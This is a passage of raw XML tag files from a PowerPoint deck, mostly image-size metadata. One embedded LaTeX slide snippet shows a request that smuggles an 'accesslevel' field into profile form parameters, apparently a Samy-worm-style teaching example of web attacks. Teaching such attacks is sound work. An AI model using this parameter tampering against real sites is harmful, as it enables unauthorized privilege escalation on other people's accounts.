  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag335.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag336.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag337.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.708355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag338.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag339.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag34.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.761382"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag340.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag341.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag342.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.4028"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag343.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag344.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag345.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.638889"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag346.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag347.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.138889"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag348.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag349.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="2.847244"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.806836"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag350.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag351.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag352.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag353.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag354.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.930577"/>
  <p:tag name="ORIGINALWIDTH" val="3.263911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag355.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.013911"/>
  <p:tag name="ORIGINALWIDTH" val="1.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag356.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag357.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag358.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag359.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.638889"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag36.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.431818"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag360.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.013911"/>
  <p:tag name="ORIGINALWIDTH" val="1.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag361.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag362.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag363.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag364.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag365.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag366.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag367.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.888889"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag368.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag369.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.431818"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag370.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag371.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag372.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag373.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag374.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="2.847244"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag375.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="2.986133"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag376.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag377.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag378.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.013911"/>
  <p:tag name="ORIGINALWIDTH" val="1.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag379.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.170472"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag380.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag381.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag382.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.638889"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag383.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag384.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag385.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag386.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.708355"/>
  <p:tag name="ORIGINALWIDTH" val="2.708355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag387.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375022"/>
  <p:tag name="ORIGINALWIDTH" val="1.180577"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag388.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="43.93752"/>
  <p:tag name="ORIGINALWIDTH" val="110.5"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;\&amp;name=Samy&#10;\&amp;description=Samy is my hero&#10;\&amp;accesslevel[descriptuion]=2&#10;\dots (many lines omitted) \dots&#10;\&amp;guid=47&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="20"/>
  <p:tag name="IGUANATEXCURSOR" val="203"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag389.xml><?xml version="1.0" encoding="utf-8"?>
